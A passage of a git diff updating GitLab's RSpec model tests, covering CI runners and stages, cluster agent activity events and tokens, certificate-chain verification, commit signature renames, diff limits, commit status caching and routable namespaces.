- let_it_be(:parent_group) { create(:group) } - let_it_be(:parent_runner) { create(:ci_runner, :group, groups: [parent_group]) } - let_it_be(:group) { create(:group, parent: parent_group) } + context 'runner belonging to parent group' do + let_it_be(:parent_group) { create(:group) } + let_it_be(:parent_runner) { create(:ci_runner, :group, groups: [parent_group]) } + let_it_be(:group) { create(:group, parent: parent_group) } - context 'when include_parent option is passed' do - it 'returns the group runner from the parent group' do - expect(described_class.belonging_to_group(group.id, include_ancestors: true)).to contain_exactly(parent_runner) + context 'when include_parent option is passed' do + it 'returns the group runner from the parent group' do + expect(described_class.belonging_to_group(group.id, include_ancestors: true)).to contain_exactly(parent_runner) + end end - end - context 'when include_parent option is not passed' do - it 'does not return the group runner from the parent group' do - expect(described_class.belonging_to_group(group.id)).to be_empty + context 'when include_parent option is not passed' do + it 'does not return the group runner from the parent group' do + expect(described_class.belonging_to_group(group.id)).to be_empty + end end end end + + it_behaves_like 'returns group runners' + + context 'when feature flag :linear_runner_ancestor_scopes is disabled' do + before do + stub_feature_flags(linear_runner_ancestor_scopes: false) + end + + it_behaves_like 'returns group runners' + end end end diff --git a/spec/models/ci/stage_spec.rb b/spec/models/ci/stage_spec.rb index 5e0fcb4882f..2b6f22e68f1 100644 --- a/spec/models/ci/stage_spec.rb +++ b/spec/models/ci/stage_spec.rb @@ -28,6 +28,18 @@ RSpec.describe Ci::Stage, :models do end end + describe '.by_position' do + it 'finds stages by position' do + a = create(:ci_stage_entity, position: 1) + b = create(:ci_stage_entity, position: 2) + c = create(:ci_stage_entity, position: 3) + + expect(described_class.by_position(1)).to contain_exactly(a) + expect(described_class.by_position(2)).to contain_exactly(b) + expect(described_class.by_position(%w[1 3])).to contain_exactly(a, c) + end + end + describe '.by_name' do it 'finds stages by name' do a = create(:ci_stage_entity, name: 'a') diff --git a/spec/models/clusters/agent_spec.rb b/spec/models/clusters/agent_spec.rb index f9df84e8ff4..3b521086c14 100644 --- a/spec/models/clusters/agent_spec.rb +++ b/spec/models/clusters/agent_spec.rb @@ -75,4 +75,37 @@ RSpec.describe Clusters::Agent do expect(agent.has_access_to?(create(:project))).to be_falsey end end + + describe '#active?' do + let_it_be(:agent) { create(:cluster_agent) } + + let!(:token) { create(:cluster_agent_token, agent: agent, last_used_at: last_used_at) } + + subject { agent.active? } + + context 'agent has never connected' do + let(:last_used_at) { nil } + + it { is_expected.to be_falsey } + end + + context 'agent has connected, but not recently' do + let(:last_used_at) { 2.hours.ago } + + it { is_expected.to be_falsey } + end + + context 'agent has connected recently' do + let(:last_used_at) { 2.minutes.ago } + + it { is_expected.to be_truthy } + end + + context 'agent has multiple tokens' do + let!(:inactive_token) { create(:cluster_agent_token, agent: agent, last_used_at: 2.hours.ago) } + let(:last_used_at) { 2.minutes.ago } + + it { is_expected.to be_truthy } + end + end end diff --git a/spec/models/clusters/agent_token_spec.rb b/spec/models/clusters/agent_token_spec.rb index bde4798abec..ad9f948224f 100644 --- a/spec/models/clusters/agent_token_spec.rb +++ b/spec/models/clusters/agent_token_spec.rb @@ -39,7 +39,9 @@ RSpec.describe Clusters::AgentToken do end describe '#track_usage', :clean_gitlab_redis_cache do - let(:agent_token) { create(:cluster_agent_token) } + let_it_be(:agent) { create(:cluster_agent) } + + let(:agent_token) { create(:cluster_agent_token, agent: agent) } subject { agent_token.track_usage } @@ -73,6 +75,34 @@ RSpec.describe Clusters::AgentToken do expect_redis_update end end + + context 'agent is inactive' do + before do + allow(agent).to receive(:active?).and_return(false) + end + + it 'creates an activity event' do + expect { subject }.to change { agent.activity_events.count } + + event = agent.activity_events.last + expect(event).to have_attributes( + kind: 'agent_connected', + level: 'info', + recorded_at: agent_token.reload.read_attribute(:last_used_at), + agent_token: agent_token + ) + end + end + + context 'agent is active' do + before do + allow(agent).to receive(:active?).and_return(true) + end + + it 'does not create an activity event' do + expect { subject }.not_to change { agent.activity_events.count } + end + end end def expect_redis_update diff --git a/spec/models/clusters/agents/activity_event_spec.rb b/spec/models/clusters/agents/activity_event_spec.rb new file mode 100644 index 00000000000..18b9c82fa6a --- /dev/null +++ b/spec/models/clusters/agents/activity_event_spec.rb @@ -0,0 +1,32 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Clusters::Agents::ActivityEvent do + it { is_expected.to belong_to(:agent).class_name('Clusters::Agent').required } + it { is_expected.to belong_to(:user).optional } + it { is_expected.to belong_to(:agent_token).class_name('Clusters::AgentToken').optional } + + it { is_expected.to validate_presence_of(:kind) } + it { is_expected.to validate_presence_of(:level) } + it { is_expected.to validate_presence_of(:recorded_at) } + it { is_expected.to nullify_if_blank(:detail) } + + describe 'scopes' do + let_it_be(:agent) { create(:cluster_agent) } + + describe '.in_timeline_order' do + let(:recorded_at) { 1.hour.ago } + + let!(:event1) { create(:agent_activity_event, agent: agent, recorded_at: recorded_at) } + let!(:event2) { create(:agent_activity_event, agent: agent, recorded_at: Time.current) } + let!(:event3) { create(:agent_activity_event, agent: agent, recorded_at: recorded_at) } + + subject { described_class.in_timeline_order } + + it 'sorts by recorded_at: :desc, id: :desc' do + is_expected.to eq([event2, event3, event1]) + end + end + end +end diff --git a/spec/models/clusters/applications/runner_spec.rb b/spec/models/clusters/applications/runner_spec.rb index 806c60d5aff..434d7ad4a90 100644 --- a/spec/models/clusters/applications/runner_spec.rb +++ b/spec/models/clusters/applications/runner_spec.rb @@ -69,66 +69,9 @@ RSpec.describe Clusters::Applications::Runner do expect(values).to include('privileged: true') expect(values).to include('image: ubuntu:16.04') expect(values).to include('resources') - expect(values).to match(/runnerToken: ['"]?#{Regexp.escape(ci_runner.token)}/) expect(values).to match(/gitlabUrl: ['"]?#{Regexp.escape(Gitlab::Routing.url_helpers.root_url)}/) end - context 'without a runner' do - let(:application) { create(:clusters_applications_runner, runner: nil, cluster: cluster) } - let(:runner) { application.runner } - - shared_examples 'runner creation' do - it 'creates a runner' do - expect { subject }.to change { Ci::Runner.count }.by(1) - end - - it 'uses the new runner token' do - expect(values).to match(/runnerToken: '?#{Regexp.escape(runner.token)}/) - end - end - - context 'project cluster' do - let(:project) { create(:project) } - let(:cluster) { create(:cluster, :with_installed_helm, projects: [project]) } - - include_examples 'runner creation' - - it 'creates a project runner' do - subject - - runner_projects = Project.where(id: runner.runner_projects.pluck(:project_id)) - expect(runner).to be_project_type - expect(runner_projects).to match_array [project] - end - end - - context 'group cluster' do - let(:group) { create(:group) } - let(:cluster) { create(:cluster, :with_installed_helm, cluster_type: :group_type, groups: [group]) } - - include_examples 'runner creation' - - it 'creates a group runner' do - subject - - expect(runner).to be_group_type - expect(runner.runner_namespaces.pluck(:namespace_id)).to match_array [group.id] - end - end - - context 'instance cluster' do - let(:cluster) { create(:cluster, :with_installed_helm, :instance) } - - include_examples 'runner creation' - - it 'creates an instance runner' do - subject - - expect(runner).to be_instance_type - end - end - end - context 'with duplicated values on vendor/runner/values.yaml' do let(:stub_values) do { diff --git a/spec/models/clusters/platforms/kubernetes_spec.rb b/spec/models/clusters/platforms/kubernetes_spec.rb index a4cae93ff84..b298bf2c8bb 100644 --- a/spec/models/clusters/platforms/kubernetes_spec.rb +++ b/spec/models/clusters/platforms/kubernetes_spec.rb @@ -201,7 +201,7 @@ RSpec.describe Clusters::Platforms::Kubernetes do it { is_expected.to be_an_instance_of(Gitlab::Kubernetes::KubeClient) } context 'ca_pem is a single certificate' do - let(:ca_pem) { File.read(Rails.root.join('spec/fixtures/clusters/ca_certificate.pem')) } + let(:ca_pem) { File.read(Rails.root.join('spec/fixtures/clusters/root_certificate.pem')) } let(:kubernetes) do build(:cluster_platform_kubernetes, :configured, @@ -228,21 +228,22 @@ RSpec.describe Clusters::Platforms::Kubernetes do ca_pem: cert_chain) end - it 'includes chain of certificates' do - cert1_file = File.read(Rails.root.join('spec/fixtures/clusters/root_certificate.pem')) - cert1 = OpenSSL::X509::Certificate.new(cert1_file) - - cert2_file = File.read(Rails.root.join('spec/fixtures/clusters/intermediate_certificate.pem')) - cert2 = OpenSSL::X509::Certificate.new(cert2_file) - - cert3_file = File.read(Rails.root.join('spec/fixtures/clusters/ca_certificate.pem')) - cert3 = OpenSSL::X509::Certificate.new(cert3_file) + where(:fixture_path) do + %w[ + spec/fixtures/clusters/root_certificate.pem + spec/fixtures/clusters/intermediate_certificate.pem + spec/fixtures/clusters/leaf_certificate.pem + ] + end - cert_store = kubernetes.kubeclient.kubeclient_options[:ssl_options][:cert_store] + with_them do + it 'includes chain of certificates' do + cert_store = kubernetes.kubeclient.kubeclient_options[:ssl_options][:cert_store] + cert_file = File.read(Rails.root.join(fixture_path)) + certificate = OpenSSL::X509::Certificate.new(cert_file) - expect(cert_store.verify(cert1)).to be true - expect(cert_store.verify(cert2)).to be true - expect(cert_store.verify(cert3)).to be true + expect(cert_store.verify(certificate)).to be true + end end end end diff --git a/spec/models/gpg_signature_spec.rb b/spec/models/commit_signatures/gpg_signature_spec.rb index 7a1799c670e..9646e974f40 100644 --- a/spec/models/gpg_signature_spec.rb +++ b/spec/models/commit_signatures/gpg_signature_spec.rb @@ -2,7 +2,7 @@ require 'spec_helper' -RSpec.describe GpgSignature do +RSpec.describe CommitSignatures::GpgSignature do let(:commit_sha) { '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33' } let!(:project) { create(:project, :repository, path: 'sample-project') } let!(:commit) { create(:commit, project: project, sha: commit_sha) } @@ -13,7 +13,7 @@ RSpec.describe GpgSignature do it_behaves_like 'having unique enum values' describe 'associations' do - it { is_expected.to belong_to(:project) } + it { is_expected.to belong_to(:project).required } it { is_expected.to belong_to(:gpg_key) } it { is_expected.to belong_to(:gpg_key_subkey) } end diff --git a/spec/models/x509_commit_signature_spec.rb b/spec/models/commit_signatures/x509_commit_signature_spec.rb index 2efb77c96ad..076f209e1b7 100644 --- a/spec/models/x509_commit_signature_spec.rb +++ b/spec/models/commit_signatures/x509_commit_signature_spec.rb @@ -2,7 +2,7 @@ require 'spec_helper' -RSpec.describe X509CommitSignature do +RSpec.describe CommitSignatures::X509CommitSignature do let(:commit_sha) { '189a6c924013fc3fe40d6f1ec1dc20214183bc97' } let(:project) { create(:project, :public, :repository) } let!(:commit) { create(:commit, project: project, sha: commit_sha) } diff --git a/spec/models/commit_spec.rb b/spec/models/commit_spec.rb index ac0ae17f8f7..2176eea75bc 100644 --- a/spec/models/commit_spec.rb +++ b/spec/models/commit_spec.rb @@ -676,68 +676,18 @@ eos describe '.diff_max_files' do subject(:diff_max_files) { described_class.diff_max_files } - let(:increased_diff_limits) { false } - let(:configurable_diff_limits) { false } - - before do - stub_feature_flags(increased_diff_limits: increased_diff_limits, configurable_diff_limits: configurable_diff_limits) - end - - context 'when increased_diff_limits is enabled' do - let(:increased_diff_limits) { true } - - it 'returns 3000' do - expect(diff_max_files).to eq(3000) - end - end - - context 'when configurable_diff_limits is enabled' do - let(:configurable_diff_limits) { true } - - it 'returns the current settings' do - Gitlab::CurrentSettings.update!(diff_max_files: 1234) - expect(diff_max_files).to eq(1234) - end - end - - context 'when neither feature flag is enabled' do - it 'returns 1000' do - expect(diff_max_files).to eq(1000) - end + it 'returns the current settings' do + Gitlab::CurrentSettings.update!(diff_max_files: 1234) + expect(diff_max_files).to eq(1234) end end describe '.diff_max_lines' do subject(:diff_max_lines) { described_class.diff_max_lines } - let(:increased_diff_limits) { false } - let(:configurable_diff_limits) { false } - - before do - stub_feature_flags(increased_diff_limits: increased_diff_limits, configurable_diff_limits: configurable_diff_limits) - end - - context 'when increased_diff_limits is enabled' do - let(:increased_diff_limits) { true } - - it 'returns 100000' do - expect(diff_max_lines).to eq(100000) - end - end - - context 'when configurable_diff_limits is enabled' do - let(:configurable_diff_limits) { true } - - it 'returns the current settings' do - Gitlab::CurrentSettings.update!(diff_max_lines: 65321) - expect(diff_max_lines).to eq(65321) - end - end - - context 'when neither feature flag is enabled' do - it 'returns 50000' do - expect(diff_max_lines).to eq(50000) - end + it 'returns the current settings' do + Gitlab::CurrentSettings.update!(diff_max_lines: 65321) + expect(diff_max_lines).to eq(65321) end end diff --git a/spec/models/commit_status_spec.rb b/spec/models/commit_status_spec.rb index 59d14574c02..665a2a936af 100644 --- a/spec/models/commit_status_spec.rb +++ b/spec/models/commit_status_spec.rb @@ -46,10 +46,28 @@ RSpec.describe CommitStatus do describe 'status state machine' do let!(:commit_status) { create(:commit_status, :running, project: project) } - it 'invalidates the cache after a transition' do - expect(ExpireJobCacheWorker).to receive(:perform_async).with(commit_status.id) + context 'when expire_job_and_pipeline_cache_synchronously is enabled' do + before do + stub_feature_flags(expire_job_and_pipeline_cache_synchronously: true) + end + + it 'invalidates the cache after a transition' do + expect(commit_status).to receive(:expire_etag_cache!) - commit_status.success! + commit_status.success! + end + end + + context 'when expire_job_and_pipeline_cache_synchronously is disabled' do + before do + stub_feature_flags(expire_job_and_pipeline_cache_synchronously: false) + end + + it 'invalidates the cache after a transition' do + expect(ExpireJobCacheWorker).to receive(:perform_async).with(commit_status.id) + + commit_status.success! + end end describe 'transitioning to running' do @@ -97,32 +115,6 @@ RSpec.describe CommitStatus do end end - describe '.updated_before' do - let!(:lookback) { 5.days.ago } - let!(:timeout) { 1.day.ago } - let!(:before_lookback) { lookback - 1.hour } - let!(:after_lookback) { lookback + 1.hour } - let!(:before_timeout) { timeout - 1.hour } - let!(:after_timeout) { timeout + 1.hour } - - subject { described_class.updated_before(lookback: lookback, timeout: timeout) } - - def create_build_with_set_timestamps(created_at:, updated_at:) - travel_to(created_at) { create(:ci_build, created_at: Time.current) }.tap do |build| - travel_to(updated_at) { build.update!(status: :failed) } - end - end - - it 'finds builds updated and created in the window between lookback and timeout' do - build_in_lookback_timeout_window = create_build_with_set_timestamps(created_at: after_lookback, updated_at: before_timeout) - build_outside_lookback_window = create_build_with_set_timestamps(created_at: before_lookback, updated_at: before_timeout) - build_outside_timeout_window = create_build_with_set_timestamps(created_at: after_lookback, updated_at: after_timeout) - - expect(subject).to contain_exactly(build_in_lookback_timeout_window) - expect(subject).not_to include(build_outside_lookback_window, build_outside_timeout_window) - end - end - describe '.scheduled_at_before' do let!(:never_scheduled) { create(:commit_status) } let!(:stale_scheduled) { create(:commit_status, scheduled_at: 1.day.ago) } @@ -773,6 +765,14 @@ RSpec.describe CommitStatus do it_behaves_like 'incrementing failure reason counter' end + + context 'when status is manual' do + let(:commit_status) { create(:commit_status, :manual) } + + it 'is able to be dropped' do + expect { commit_status.drop! }.to change { commit_status.status }.from('manual').to('failed') + end + end end describe 'ensure stage assignment' do @@ -958,4 +958,32 @@ RSpec.describe CommitStatus do expect(build_from_other_pipeline.reload).to have_attributes(retried: false, processed: false) end end + + describe '.bulk_insert_tags!' do + let(:statuses) { double('statuses') } + let(:tag_list_by_build) { double('tag list') } + let(:inserter) { double('inserter') } + + it 'delegates to bulk insert class' do + expect(Gitlab::Ci::Tags::BulkInsert) + .to receive(:new) + .with(statuses, tag_list_by_build) + .and_return(inserter) + + expect(inserter).to receive(:insert!) + + described_class.bulk_insert_tags!(statuses, tag_list_by_build) + end + end + + describe '#expire_etag_cache!' do + it 'expires the etag cache' do + expect_next_instance_of(Gitlab::EtagCaching::Store) do |etag_store| + job_path = Gitlab::Routing.url_helpers.project_build_path(project, commit_status.id, format: :json) + expect(etag_store).to receive(:touch).with(job_path) + end + + commit_status.expire_etag_cache! + end + end end diff --git a/spec/models/concerns/after_commit_queue_spec.rb b/spec/models/concerns/after_commit_queue_spec.rb new file mode 100644 index 00000000000..40cddde333e --- /dev/null +++ b/spec/models/concerns/after_commit_queue_spec.rb @@ -0,0 +1,128 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe AfterCommitQueue do + describe '#run_after_commit' do + it 'runs after record is saved' do + called = false + test_proc = proc { called = true } + + project = build(:project) + project.run_after_commit(&test_proc) + + expect(called).to be false + + # save! is run in its own transaction + project.save! + + expect(called).to be true + end + + it 'runs after transaction is committed' do + called = false + test_proc = proc { called = true } + + project = build(:project) + + Project.transaction do + project.run_after_commit(&test_proc) + + project.save! + + expect(called).to be false + end + + expect(called).to be true + end + end + + describe '#run_after_commit_or_now' do + it 'runs immediately if not within a transction' do + called = false + test_proc = proc { called = true } + + project = build(:project) + + project.run_after_commit_or_now(&test_proc) + + expect(called).to be true + end + + it 'runs after transaction has completed' do + called = false + test_proc = proc { called = true } + + project = build(:project) + + Project.transaction do + # Add this record to the current transaction so that after commit hooks + # are called + Project.connection.add_transaction_record(project) + + project.run_after_commit_or_now(&test_proc) + + project.save! + + expect(called).to be false + end + + expect(called).to be true + end + + context 'multiple databases - Ci::ApplicationRecord models' do + before do + skip_if_multiple_databases_not_setup + + table_sql = <<~SQL + CREATE TABLE _test_ci_after_commit_queue ( + id serial NOT NULL PRIMARY KEY); + SQL + + ::Ci::ApplicationRecord.connection.execute(table_sql) + end + + let(:ci_klass) do + Class.new(Ci::ApplicationRecord) do + self.table_name = '_test_ci_after_commit_queue' + + include AfterCommitQueue + + def self.name + 'TestCiAfterCommitQueue' + end + end + end + + let(:ci_record) { ci_klass.new } + + it 'runs immediately if not within a transaction' do + called = false + test_proc = proc { called = true } + + ci_record.run_after_commit_or_now(&test_proc) + + expect(called).to be true + end + + it 'runs after transaction has completed' do + called = false + test_proc = proc { called = true } + + Ci::ApplicationRecord.transaction do + # Add this record to the current transaction so that after commit hooks + # are called + Ci::ApplicationRecord.connection.add_transaction_record(ci_record) + + ci_record.run_after_commit_or_now(&test_proc) + + ci_record.save! + + expect(called).to be false + end + + expect(called).to be true + end + end + end +end diff --git a/spec/models/concerns/case_sensitivity_spec.rb b/spec/models/concerns/case_sensitivity_spec.rb index 269f9577267..6e624c687c4 100644 --- a/spec/models/concerns/case_sensitivity_spec.rb +++ b/spec/models/concerns/case_sensitivity_spec.rb @@ -9,11 +9,12 @@ RSpec.describe CaseSensitivity do Class.new(ActiveRecord::Base) do include CaseSensitivity self.table_name = 'namespaces' + self.inheritance_column = :_type_disabled end end - let_it_be(:model_1) { model.create!(path: 'mOdEl-1', name: 'mOdEl 1') } - let_it_be(:model_2) { model.create!(path: 'mOdEl-2', name: 'mOdEl 2') } + let_it_be(:model_1) { model.create!(path: 'mOdEl-1', name: 'mOdEl 1', type: Namespaces::UserNamespace.sti_name) } + let_it_be(:model_2) { model.create!(path: 'mOdEl-2', name: 'mOdEl 2', type: Group.sti_name) } it 'finds a single instance by a single attribute regardless of case' do expect(model.iwhere(path: 'MODEL-1')).to contain_exactly(model_1) diff --git a/spec/models/concerns/group_descendant_spec.rb b/spec/models/concerns/group_descendant_spec.rb index b29fa910ee6..d593d829dca 100644 --- a/spec/models/concerns/group_descendant_spec.rb +++ b/spec/models/concerns/group_descendant_spec.rb @@ -19,14 +19,16 @@ RSpec.describe GroupDescendant do query_count = ActiveRecord::QueryRecorder.new { test_group.hierarchy }.count - expect(query_count).to eq(1) + # use_traversal_ids_for_ancestors_upto actor based feature flag check adds an extra query. + expect(query_count).to eq(2) end it 'only queries once for the ancestors when a top is given' do test_group = create(:group, parent: subsub_group).reload recorder = ActiveRecord::QueryRecorder.new { test_group.hierarchy(subgroup) } - expect(recorder.count).to eq(1) + # use_traversal_ids_for_ancestors_upto actor based feature flag check adds an extra query. + expect(recorder.count).to eq(2) end it 'builds a hierarchy for a group' do diff --git a/spec/models/concerns/loose_foreign_key_spec.rb b/spec/models/concerns/loose_foreign_key_spec.rb deleted file mode 100644 index 42da69eb75e..00000000000 --- a/spec/models/concerns/loose_foreign_key_spec.rb +++ /dev/null @@ -1,66 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe LooseForeignKey do - let(:project_klass) do - Class.new(ApplicationRecord) do - include LooseForeignKey - - self.table_name = 'projects' - - loose_foreign_key :issues, :project_id, on_delete: :async_delete - loose_foreign_key 'merge_requests', 'project_id', 'on_delete' => 'async_nullify' - end - end - - it 'exposes the loose foreign key definitions' do - definitions = project_klass.loose_foreign_key_definitions - - tables = definitions.map(&:to_table) - expect(tables).to eq(%w[issues merge_requests]) - end - - it 'casts strings to symbol' do - definition = project_klass.loose_foreign_key_definitions.last - - expect(definition.from_table).to eq('projects') - expect(definition.to_table).to eq('merge_requests') - expect(definition.column).to eq('project_id') - expect(definition.on_delete).to eq(:async_nullify) - end - - context 'validation' do - context 'on_delete validation' do - let(:invalid_class) do - Class.new(ApplicationRecord) do - include LooseForeignKey - - self.table_name = 'projects' - - loose_foreign_key :issues, :project_id, on_delete: :async_delete - loose_foreign_key :merge_requests, :project_id, on_delete: :async_nullify - loose_foreign_key :merge_requests, :project_id, on_delete: :destroy - end - end - - it 'raises error when invalid `on_delete` option was given' do - expect { invalid_class }.to raise_error /Invalid on_delete option given: destroy/ - end - end - - context 'inheritance validation' do - let(:inherited_project_class) do - Class.new(Project) do - include LooseForeignKey - - loose_foreign_key :issues, :project_id, on_delete: :async_delete - end - end - - it 'raises error when loose_foreign_key is defined in a child ActiveRecord model' do - expect { inherited_project_class }.to raise_error /Please define the loose_foreign_key on the Project class/ - end - end - end -end diff --git a/spec/models/concerns/participable_spec.rb b/spec/models/concerns/participable_spec.rb index 903c7ae16b6..50cf7377b99 100644 --- a/spec/models/concerns/participable_spec.rb +++ b/spec/models/concerns/participable_spec.rb @@ -51,7 +51,9 @@ RSpec.describe Participable do end it 'supports attributes returning another Participable' do - other_model = Class.new { include Participable } + other_model = Class.new do + include Participable + end other_model.participant(:bar) model.participant(:foo) @@ -115,6 +117,76 @@ RSpec.describe Participable do end end + describe '#visible_participants' do + before do + allow(Ability).to receive(:allowed?).and_call_original + allow(Ability).to receive(:allowed?).with(anything, :read_class, anything) { readable } + end + + let(:readable) { true } + + it 'returns the list of participants' do + model.participant(:foo) + model.participant(:bar) + + user1 = build(:user) + user2 = build(:user) + user3 = build(:user) + project = build(:project, :public) + instance = model.new + + allow(instance).to receive_message_chain(:model_name, :element) { 'class' } + expect(instance).to receive(:foo).and_return(user2) + expect(instance).to receive(:bar).and_return(user3) + expect(instance).to receive(:project).thrice.and_return(project) + + participants = instance.visible_participants(user1) + + expect(participants).to include(user2) + expect(participants).to include(user3) + end + + context 'when Participable is not readable by the user' do + let(:readable) { false } + + it 'does not return unavailable participants' do + model.participant(:bar) + + instance = model.new + user1 = build(:user) + user2 = build(:user) + project = build(:project, :public) + + allow(instance).to receive_message_chain(:model_name, :element) { 'class' } + allow(instance).to receive(:bar).and_return(user2) + expect(instance).to receive(:project).thrice.and_return(project) + + expect(instance.visible_participants(user1)).to be_empty + end + + context 'when feature flag is disabled' do + before do + stub_feature_flags(verify_participants_access: false) + end + + it 'returns unavailable participants' do + model.participant(:bar) + + instance = model.new + user1 = build(:user) + user2 = build(:user) + project = build(:project, :public) + + allow(instance).to receive_message_chain(:model_name, :element) { 'class' } + allow(instance).to receive(:bar).and_return(user2) + expect(instance).to receive(:project).thrice.and_return(project) + + expect(instance.visible_participants(user1)).to match_array([user2]) + end + end + end + end + describe '#participant?' do let(:instance) { model.new } diff --git a/spec/models/concerns/routable_spec.rb b/spec/models/concerns/routable_spec.rb index 0a433a8cf4f..2330147b376 100644 --- a/spec/models/concerns/routable_spec.rb +++ b/spec/models/concerns/routable_spec.rb @@ -2,7 +2,7 @@ require 'spec_helper' -RSpec.shared_examples '.find_by_full_path' do +RSpec.shared_examples 'routable resource' do describe '.find_by_full_path', :aggregate_failures do it 'finds records by their full path' do expect(described_class.find_by_full_path(record.full_path)).to eq(record) @@ -52,13 +52,27 @@ RSpec.shared_examples '.find_by_full_path' do end end -RSpec.describe Routable do - it_behaves_like '.find_by_full_path' do - let_it_be(:record) { create(:group) } +RSpec.shared_examples 'routable resource with parent' do + it_behaves_like 'routable resource' + + describe '#full_path' do + it { expect(record.full_path).to eq "#{record.parent.full_path}/#{record.path}" } + + it 'hits the cache when not preloaded' do + forcibly_hit_cached_lookup(record, :full_path) + + expect(record.full_path).to eq("#{record.parent.full_path}/#{record.path}") + end end - it_behaves_like '.find_by_full_path' do - let_it_be(:record) { create(:project) } + describe '#full_name' do + it { expect(record.full_name).to eq "#{record.parent.human_name} / #{record.name}" } + + it 'hits the cache when not preloaded' do + forcibly_hit_cached_lookup(record, :full_name) + + expect(record.full_name).to eq("#{record.parent.human_name} / #{record.name}") + end end end @@ -66,6 +80,14 @@ RSpec.describe Group, 'Routable', :with_clean_rails_cache do let_it_be_with_reload(:group) { create(:group, name: 'foo') } let_it_be(:nested_group) { create(:group, parent: group) } + it_behaves_like 'routable resource' do + let_it_be(:record) { group } + end + + it_behaves_like 'routable resource with parent' do + let_it_be(:record) { nested_group } + end + describe 'Validations' do it { is_expected.to validate_presence_of(:route) } end @@ -119,24 +141,6 @@ RSpec.describe Group, 'Routable', :with_clean_rails_cache do end end - describe '.find_by_full_path' do - it_behaves_like '.find_by_full_path' do - let_it_be(:record) { group } - end - - it_behaves_like '.find_by_full_path' do - let_it_be(:record) { nested_group } - end - - it 'does not find projects with a matching path' do - project = create(:project) - redirect_route = create(:redirect_route, source: project) - - expect(described_class.find_by_full_path(project.full_path)).to be_nil - expect(described_class.find_by_full_path(redirect_route.path, follow_redirects: true)).to be_nil - end - end - describe '.where_full_path_in' do context 'without any paths' do it 'returns an empty relation' do @@ -195,64 +199,39 @@ RSpec.describe Group, 'Routable', :with_clean_rails_cache do expect(group.route_loaded?).to be_truthy end end - - describe '#full_path' do - it { expect(group.full_path).to eq(group.path) } - it { expect(nested_group.full_path).to eq("#{group.full_path}/#{nested_group.path}") } - - it 'hits the cache when not preloaded' do - forcibly_hit_cached_lookup(nested_group, :full_path) - - expect(nested_group.full_path).to eq("#{group.full_path}/#{nested_group.path}") - end - end - - describe '#full_name' do - it { expect(group.full_name).to eq(group.name) } - it { expect(nested_group.full_name).to eq("#{group.name} / #{nested_group.name}") } - - it 'hits the cache when not preloaded' do - forcibly_hit_cached_lookup(nested_group, :full_name) - - expect(nested_group.full_name).to eq("#{group.name} / #{nested_group.name}") - end - end end RSpec.describe Project, 'Routable', :with_clean_rails_cache do let_it_be(:namespace) { create(:namespace) } let_it_be(:project) { create(:project, namespace: namespace) } - it_behaves_like '.find_by_full_path' do + it_behaves_like 'routable resource with parent' do let_it_be(:record) { project } end +end - it 'does not find groups with a matching path' do - group = create(:group) - redirect_route = create(:redirect_route, source: group) - - expect(described_class.find_by_full_path(group.full_path)).to be_nil - expect(described_class.find_by_full_path(redirect_route.path, follow_redirects: true)).to be_nil - end - - describe '#full_path' do - it { expect(project.full_path).to eq "#{namespace.full_path}/#{project.path}" } - - it 'hits the cache when not preloaded' do - forcibly_hit_cached_lookup(project, :full_path) - - expect(project.full_path).to eq("#{namespace.full_path}/#{project.path}") +RSpec.describe Namespaces::ProjectNamespace, 'Routable', :with_clean_rails_cache do + let_it_be(:group) { create(:group) } + let_it_be(:project_namespace) do + # For now we create only project namespace w/o project, otherwise same path + # would be used for project and project namespace. + # This can be removed when route is created automatically for project namespaces. + # https://gitlab.com/gitlab-org/gitlab/-/issues/346448 + create(:project_namespace, project: nil, parent: group, + visibility_level: Gitlab::VisibilityLevel::PUBLIC, + path: 'foo', name: 'foo').tap do |project_namespace| + Route.create!(source: project_namespace, path: project_namespace.full_path, + name: project_namespace.full_name) end end - describe '#full_name' do - it { expect(project.full_name).to eq "#{namespace.human_name} / #{project.name}" } - - it 'hits the cache when not preloaded' do - forcibly_hit_cached_lookup(project, :full_name) + # we have couple of places where we use generic Namespace, in that case + # we don't want to include ProjectNamespace routes yet + it 'ignores project namespace when searching for generic namespace' do + redirect_route = create(:redirect_route, source: project_namespace) - expect(project.full_name).to eq("#{namespace.human_name} / #{project.name}") - end + expect(Namespace.find_by_full_path(project_namespace.full_path)).to be_nil + expect(Namespace.find_by_full_path(redirect_route.path, follow_redirects: true)).to be_nil end end diff --git a/spec/models/concerns/sha_attribute_spec.rb b/spec/models/concerns/sha_attribute_spec.rb index 220eadfab92..1bcf3dc8b61 100644 --- a/spec/models/concerns/sha_attribute_spec.rb +++ b/spec/models/concerns/sha_attribute_spec.rb @@ -3,7 +3,7 @@ require 'spec_helper' RSpec.describe ShaAttribute do - let(:model) { Class.new(ApplicationRecord) { include ShaAttribute } } + let(:model) { Class.new(ActiveRecord::Base) { include ShaAttribute } } before do columns = [ diff --git a/spec/models/concerns/transactions_spec.rb b/spec/models/concerns/transactions_spec.rb new file mode 100644 index 00000000000..404a33196e6 --- /dev/null +++ b/spec/models/concerns/transactions_spec.rb @@ -0,0 +1,21 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Transactions do + let(:model) { build(:project) } + + it 'is not in a transaction' do + expect(model.class).not_to be_inside_transaction + end + + it 'is in a transaction', :aggregate_failures do + Project.transaction do + expect(model.class).to be_inside_transaction + end + + ApplicationRecord.transaction do + expect(model.class).to be_inside_transaction + end + end +end diff --git a/spec/models/container_repository_spec.rb b/spec/models/container_repository_spec.rb index 846dfb30928..51fdbfebd3a 100644 --- a/spec/models/container_repository_spec.rb +++ b/spec/models/container_repository_spec.rb @@ -223,9 +223,9 @@ RSpec.describe ContainerRepository do end end - describe '.create_from_path!' do + describe '.find_or_create_from_path' do let(:repository) do - described_class.create_from_path!(ContainerRegistry::Path.new(path)) + described_class.find_or_create_from_path(ContainerRegistry::Path.new(path)) end let(:repository_path) { ContainerRegistry::Path.new(path) } @@ -291,6 +291,35 @@ RSpec.describe ContainerRepository do expect(repository.id).to eq(container_repository.id) end end + + context 'when many of the same repository are created at the same time' do + let(:path) { ContainerRegistry::Path.new(project.full_path + '/some/image') } + + it 'does not throw validation errors and only creates one repository' do + expect { repository_creation_race(path) }.to change { ContainerRepository.count }.by(1) + end + + it 'retrieves a persisted repository for all concurrent calls' do + repositories = repository_creation_race(path).map(&:value) + + expect(repositories).to all(be_persisted) + end + end + + def 